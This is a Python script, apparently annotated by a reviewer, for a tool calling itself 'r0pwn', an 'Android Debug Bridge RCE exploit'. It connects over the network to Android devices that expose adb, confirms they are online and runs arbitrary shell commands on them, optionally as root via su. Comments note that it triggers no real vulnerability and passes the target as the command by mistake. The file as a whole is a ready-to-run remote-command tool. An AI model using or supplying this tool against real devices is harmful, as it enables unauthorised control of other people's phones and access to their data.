import os
import subprocess
import sys
import time
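def connect(device):
    """Ask the local adb client to connect to *device*, then pause briefly.

    Args:
        device: Address handed to ``adb connect`` as a single argument.

    The adb client's output is captured and discarded, so this function does
    not report whether the connection succeeded.

    NOTE(review): this is the stock ``adb connect`` client call; no
    vulnerability is triggered here. It presumably only succeeds against a
    device that exposes adb over the network and accepts this host.
    """
    print("exploiting "+device+"...")
    try:
        # Argument list, no shell: the previous os.popen() string let shell
        # metacharacters in the device argument run on the operator's own
        # machine. Here the value reaches adb verbatim as one argument.
        subprocess.run(
            ["adb", "connect", device],
            stdout=subprocess.PIPE,
            check=False,
        )
    except OSError as err:
        # adb is missing or not executable; report it instead of hiding it.
        print("could not run adb: "+str(err))
    # Fixed one-second pause after the connect attempt.
    time.sleep(1)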
def header():
    """Write the start-up banner (tool name, author, description) to stdout."""
    banner_lines = (
        "",
        "======================",
        "r0pwn by Ivan Nikolsky",
        "======================",
        "Android Debug Bridge RCE exploit.",
        "",
    )
    # Joining with newlines reproduces the leading and trailing blank lines
    # of the banner; print() adds the final newline.
    print("\n".join(banner_lines))
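def substitute(code):
    """Run *code* through ``adb shell`` and discard its output.

    Args:
        code: Command line passed to ``adb shell`` as one argument.

    The command goes to whichever device the adb client selects by default;
    this function is not given the target. The command's output is captured
    and dropped, so nothing it prints is shown.
    """
    # When True the command is prefixed with ``su``; the original author notes
    # this only works on a rooted device. It is hard-coded off, so the su form
    # is never used unless this line is edited.
    angry_substitution = False

    print("substituting "+code+"...")
    time.sleep(0.5)
    print("executing "+code+"...")

    adb_args = ["adb", "shell"]
    if angry_substitution:
        adb_args.append("su")
    adb_args.append(code)
    try:
        # Argument list, no local shell: the previous string form wrapped the
        # code in single quotes, so a quote character inside it ended the
        # quoting and the remainder was interpreted on the operator's machine.
        subprocess.run(adb_args, stdout=subprocess.PIPE, check=False)
    except OSError as err:
        # adb is missing or not executable; report it instead of hiding it.
        print("could not run adb: "+str(err))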
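def _usage_exit(reason):
    """Print the usage line and the bracketed *reason*, then exit."""
    print("usage: exploit.py <target> [-s <code>]")
    print("reason ["+reason+"]")
    sys.exit()


def _require_online(target):
    """Exit unless ``adb devices`` lists *target* with no offline entry.

    The listing is parsed in Python rather than piped through ``grep``:
    the target is never placed in a shell command line, it is compared as a
    literal string (not a regular expression or substring), and only the
    target's own entries are checked for the ``offline`` state.
    """
    try:
        listing = subprocess.run(
            ["adb", "devices"],
            stdout=subprocess.PIPE,
            text=True,
            check=False,
        ).stdout
    except OSError:
        # adb unavailable: treated the same as an empty device list.
        listing = ""

    states = []
    for line in listing.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        serial = fields[0]
        # main() strips everything after the first ":" from the target, so
        # match either the bare serial or "<target>:<port>".
        if serial == target or serial.startswith(target + ":"):
            states.append(fields[1])

    if not states:
        print("failed to connect")
        print("reason [connection refused]")
        sys.exit()
    if "offline" in states:
        print("failed to connect")
        print("reason [device offline]")
        sys.exit()


def main():
    """Parse ``exploit.py <target> [-s <code>]`` and drive adb accordingly.

    With only a target, the script connects, verifies the device is listed
    and not offline, and then invokes ``adb shell``. With ``-s <code>`` it
    performs the same checks and passes the code to ``substitute``. Any other
    argument shape prints the usage line with a reason and exits.
    """
    argv = sys.argv
    if len(argv) < 2:
        _usage_exit("no args given")
    if len(argv) > 2:
        if argv[2] != "-s":
            _usage_exit("invalid flag")
        if len(argv) < 4:
            _usage_exit("no code given")
        if len(argv) > 4:
            _usage_exit("a lot of args given")

    # Everything after the first ":" is dropped, so a port given on the
    # command line is not passed on to adb.
    target = argv[1].split(":")[0]
    connect(target)
    _require_online(target)

    if len(argv) > 2:
        substitute(argv[3])
    else:
        # NOTE(review): the target string is handed to ``adb shell`` as the
        # command to run, on whichever device adb selects by default; it does
        # not select the target device. Behaviour left unchanged, confirm
        # intent. The argument list keeps the value away from the local shell.
        subprocess.call(["adb", "shell", target])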
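# Run only when executed as a script, so importing this module (for review or
# testing) does not start adb connections as a side effect.
if __name__ == "__main__":
    main()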